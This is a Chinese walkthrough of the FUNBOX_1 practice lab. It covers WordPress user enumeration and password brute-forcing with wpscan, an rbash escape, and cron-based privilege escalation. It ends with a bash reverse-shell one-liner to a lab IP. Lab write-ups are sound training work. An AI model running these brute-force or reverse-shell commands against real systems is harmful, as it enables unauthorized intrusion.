FUNBOX_1靶场详解

FUNBOX_1靶场复盘

这个系列的靶场给出的干扰因素都挺多的,必须从中找到有用的线索才可以。

这个靶场你扫描到ip地址后打开网页会发现,ip自动转换成域名了,所以我们需要添加一条hosts解析才可以。

复制代码
192.168.102.190		funbox.fritz.box

从目录扫描中可以看出这是一个wordpress的网站。

利用wpscan工具可以枚举wordpress的用户名。

复制代码
wpscan --url http://funbox.fritz.box --enumerate u

然后对用户名进行爆破一下,发现两个的密码都出来了。

复制代码
wpscan --url http://funbox.fritz.box -U users -P /usr/share/wordlists/rockyou.txt

这里是利用joe用户进行了ssh登陆,当然也可以登陆wordpress后台,但是没什么可用的东西。

登陆后发现这是一个rbash,就是这是一个只读bash。

利用ssh的-t参数我们可以跳过这个限制。

ssh上来后,ls一下发现有个mbox文件,发现类似两个邮件,并且是隔了几分钟的,所以就怀疑后台在运行着一个计时任务。

就wget下来一个pspy64,这个文件可以实时监控进程。

发现的确有一个计时任务,有两个用户都在运行,一个是UID为1000的,一个是root用户,只要我们能往这里面写的内容就可以拿到一个root的反弹shell。

发现这个文件我们是可修改的,在里面添加了一条反弹shell文件,就等拿到UID为1000的权限或者,root权限,如过没拿到ROOT权限就重新监听一下。

过了一会儿就拿到root权限了,这里应该是普通用户执行两次后root用户才会执行一次,所以要监控好root用户什么时候执行。

text 复制代码
bash -i >/dev/tcp/192.168.102.129/8888 0>&1
相关推荐
tntxia14 小时前
linux curl命令详解_curl详解
linux
扛枪的书生17 小时前
Linux 网络管理器用法速查
linux
顺风尿一寸20 小时前
Java Socket 内核之旅:从 SocketChannel.read() 到 tcp_recvmsg 与 epoll 的完整调用链路
linux
XIAOHEZIcode1 天前
Ubuntu 终端美化全栈指南:Bash 到 Kitty 踩坑实录
linux·ubuntu·命令行
唐青枫1 天前
别再只会用 cron:Linux systemd Timer 定时任务实战详解
linux
AlfredZhao3 天前
生产环境里,为什么不建议把普通端口直接暴露到公网?
linux·https·443·80
戴为沐4 天前
Linux内存扩容指南
linux
zylyehuo5 天前
Linux 彻底且安全地删除文件
linux
用户805533698035 天前
主线 U-Boot 上 RK3506:和闭源 rkbin 拔河的三个隐性契约
linux·嵌入式
用户034095297915 天前
linux fcitx 5 雾凇拼音 设置在中文输入法下仍然输入英文标点
linux